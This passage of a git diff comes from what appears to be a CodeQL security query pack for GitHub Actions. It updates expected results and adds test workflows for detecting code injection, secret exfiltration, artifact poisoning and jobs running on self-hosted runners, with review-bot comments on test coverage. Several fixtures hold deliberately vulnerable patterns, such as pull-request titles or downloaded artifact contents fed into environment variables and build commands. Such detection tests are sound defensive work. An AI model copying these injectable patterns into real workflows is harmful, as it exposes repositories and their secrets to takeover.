| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 785aaa383eb..50cb0c40d24 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -2,9 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | -| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$( { - return artifact.name == "oc-code-coverage" - })[0]; - let download = await github.rest.actions.downloadArtifact({ - owner: context.repo.owner, - repo: context.repo.repo, - artifact_id: matchArtifact.id, - archive_format: 'zip', - }); - let fs = require('fs'); - fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' - run: unzip oc-code-coverage.zip -d coverage - - name: set env vars - run: | - echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV - echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV - - name: SonarCloud Scan (PR) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD != 'develop' + - uses: sonarsource/sonarcloud-github-action@master env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ 
env.SONAR_PR_NUM }} - -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} - -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 3fbc081a0f4..259746eaec9 100644 --- a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected 
@@ -1,22 +1,6 @@ edges -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | -| .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:34:9:39:6 | Run Step | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | nodes -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | semmle.label | Job: sonar [SONAR_BASE] | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | semmle.label | Job: sonar [SONAR_HEAD] | -| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | semmle.label | Job: sonar [SONAR_PR_NUM] | -| .github/workflows/test1.yml:12:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/test1.yml:34:9:39:6 | Run Step | semmle.label | Run Step | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | semmle.label | env.SONAR_BASE | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | semmle.label | env.SONAR_HEAD | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | semmle.label | env.SONAR_PR_NUM | +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | Potential 
secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | ${{ env.SONAR_BASE }} | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | ${{ env.SONAR_HEAD }} | -| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | ${{ env.SONAR_PR_NUM }} | +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml new file mode 100644 index 00000000000..81d614e5122 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml 
@@ -0,0 +1,28 @@
+name: test
+
+on:
+ pull_request:
+
+jobs:
+ test1:
+ runs-on: [self-hosted, X64, Linux, 16c32g]
+ steps:
+ - run: cmd
+ test2:
+ runs-on:
+ group: my-group
+ labels: [self-hosted, label-1]
+ steps:
+ - run: cmd
+ test3:
+ runs-on:
+ - 'self-hosted'
+ - 'linux'
+ - 'x64'
+ - 'metal'
+ steps:
+ - run: echo "foo"
+ test4:
+ runs-on: self-hosted-azure
+ steps:
+ - run: cmd
diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
new file mode 100644
index 00000000000..243bac92599
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml
@@ -0,0 +1,26 @@
+name: test
+
+on:
+ push:
+
+jobs:
+ test1:
+ runs-on: [self-hosted, foo]
+ steps:
+ - run: cmd
+ test2:
+ runs-on:
+ group: my-group
+ labels: [self-hosted, foo]
+ steps:
+ - run: cmd
+ test3:
+ runs-on:
+ - 'self-hosted'
+ - 'foo'
+ steps:
+ - run: cmd
+ test4:
+ runs-on: self-hosted-azure
+ steps:
+ - run: cmd
diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
new file mode 100644
index 00000000000..920a818ab35
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected
@@ -0,0 +1,4 @@
+| .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner |
+| .github/workflows/test1.yml:26:5:28:15 | Job: test4 | Job runs on self-hosted runner |
diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
new file mode 100644
index 00000000000..43692e5ce43
--- /dev/null
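Review bot: The `pull_request` fixture (test1.yml) has no job that must stay unreported, so its four expected rows, one per job, cannot catch a query that flags every `pull_request` job regardless of runner. Adding a fifth job with `runs-on: ubuntu-latest` would pin that GitHub-hosted runners are excluded. `test4` uses the single label `self-hosted-azure`, a custom label that only starts with `self-hosted`; a comment such as `# custom label: reported because it starts with "self-hosted"` would record that this is intended. I am inferring prefix matching from the expected row, since the query itself is not in this hunk.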
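Review bot: Nothing in test2.yml says it is the negative case: the same self-hosted `runs-on` shapes appear under `on: push`, and the expected output lists no test2.yml row. A header comment such as `# push-only trigger: self-hosted jobs here must not be reported` would stop a later maintainer from treating the missing results as a regression. If the query is meant to scope on triggers that run code from outside contributors, a `pull_request_target` fixture would be worth adding alongside; that is a guess at intent, since the query is outside this hunk.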
+++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref
@@ -0,0 +1,2 @@
+Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql
+
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
index 429a4cdc0c5..3d1df408c3b 100644
--- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
+++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected
@@ -1,43 +1,43 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| 
.github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses 
Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| 
.github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E 
"*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected index ba635b1d74d..5bea5c7e52c 100644 --- a/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected 
@@ -1,56 +1,56 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:9:23:29 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | +| 
.github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses 
Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./x.py build -j$(nproc) --compiler gcc --skip-build | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning21.yml:18:9:20:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning21.yml:19:14:20:20 | ./foo/cmd\n | semmle.label | ./foo/cmd\n | | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | semmle.label | Uses Step | -| .github/workflows/artifactpoisoning22.yml:17:9:18:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning22.yml:18:14:18:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| 
.github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | semmle.label | ./bar/cmd\n | | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | semmle.label | npm install\nnpm run lint\n | | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | semmle.label | ./foo/cmd | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | semmle.label | ./cmd | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | -| .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E 
